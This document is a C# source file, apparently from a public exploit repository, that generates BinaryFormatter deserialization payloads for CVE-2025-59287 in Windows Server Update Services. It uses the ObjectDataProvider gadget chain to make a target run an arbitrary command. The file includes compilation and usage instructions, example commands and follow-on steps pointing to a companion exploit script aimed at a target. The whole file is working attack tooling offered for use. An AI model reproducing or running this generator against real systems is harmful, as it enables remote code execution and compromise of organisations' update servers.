README.md
Rendering markdown...
using System;
using System.IO;
using System.Runtime.Serialization.Formatters.Binary;
using System.Windows.Data;
using System.Diagnostics;
using System.Collections.ObjectModel;
namespace WSUSExploit
{
/// <summary>
/// Generates malicious BinaryFormatter payloads for CVE-2025-59287
/// This exploits ObjectDataProvider gadget chain to execute arbitrary commands
///
/// Compilation:
/// csc /reference:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\WindowsBase.dll" BinaryFormatterPayloadGenerator.cs
///
/// Usage:
/// BinaryFormatterPayloadGenerator.exe <command>
/// Example: BinaryFormatterPayloadGenerator.exe calc.exe
/// </summary>
class BinaryFormatterPayloadGenerator
{
static void Main(string[] args)
{
Console.WriteLine("=" + new string('=', 60));
Console.WriteLine("[*] CVE-2025-59287 BinaryFormatter Payload Generator");
Console.WriteLine("=" + new string('=', 60));
if (args.Length < 1)
{
Console.WriteLine("\nUsage: BinaryFormatterPayloadGenerator.exe <command>");
Console.WriteLine("\nExamples:");
Console.WriteLine(" BinaryFormatterPayloadGenerator.exe calc.exe");
Console.WriteLine(" BinaryFormatterPayloadGenerator.exe \"powershell -c whoami\"");
Console.WriteLine(" BinaryFormatterPayloadGenerator.exe \"cmd /c echo pwned\"");
return;
}
string command = args[0];
Console.WriteLine($"\n[*] Generating BinaryFormatter payload for command: {command}");
try
{
// Create ObjectDataProvider gadget
// This is a known .NET deserialization gadget that can execute arbitrary methods
ObjectDataProvider objectDataProvider = new ObjectDataProvider();
objectDataProvider.MethodName = "Start";
objectDataProvider.ObjectInstance = new Process();
// Parse command into ProcessStartInfo
ProcessStartInfo processStartInfo = new ProcessStartInfo();
// Handle commands with arguments
if (command.Contains(" "))
{
string[] parts = command.Split(new char[] { ' ' }, 2, StringSplitOptions.RemoveEmptyEntries);
processStartInfo.FileName = parts[0];
if (parts.Length > 1)
{
processStartInfo.Arguments = parts[1];
}
}
else
{
processStartInfo.FileName = command;
}
processStartInfo.UseShellExecute = false;
processStartInfo.CreateNoWindow = true;
// Method parameters for Process.Start(ProcessStartInfo)
Collection<object> methodParameters = new Collection<object>();
methodParameters.Add(processStartInfo);
objectDataProvider.MethodParameters = methodParameters;
// Serialize using BinaryFormatter
BinaryFormatter formatter = new BinaryFormatter();
using (MemoryStream ms = new MemoryStream())
{
formatter.Serialize(ms, objectDataProvider);
byte[] payload = ms.ToArray();
// Generate filename
string timestamp = DateTime.Now.ToString("yyyyMMddHHmmss");
string filename = $"payload_{timestamp}.bin";
string base64File = $"payload_{timestamp}.b64";
// Save binary payload
File.WriteAllBytes(filename, payload);
// Save base64 encoded version (easier to transfer)
string base64Payload = Convert.ToBase64String(payload);
File.WriteAllText(base64File, base64Payload);
Console.WriteLine("\n[+] Payload generated successfully!");
Console.WriteLine($" Binary file: {filename}");
Console.WriteLine($" Base64 file: {base64File}");
Console.WriteLine($" Size: {payload.Length} bytes");
Console.WriteLine("\n[*] Next steps:");
Console.WriteLine($" 1. Encrypt the payload: python encrypt_payload.py {filename}");
Console.WriteLine($" 2. Or use directly: python wsus_exploit.py -t <target> -f {filename}");
}
}
catch (Exception ex)
{
Console.WriteLine($"\n[!] Error generating payload: {ex.Message}");
Console.WriteLine(ex.StackTrace);
if (ex is FileNotFoundException)
{
Console.WriteLine("\n[*] Make sure WindowsBase.dll is referenced during compilation");
Console.WriteLine("[*] Use: csc /reference:\"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\WindowsBase.dll\" BinaryFormatterPayloadGenerator.cs");
}
}
}
}
}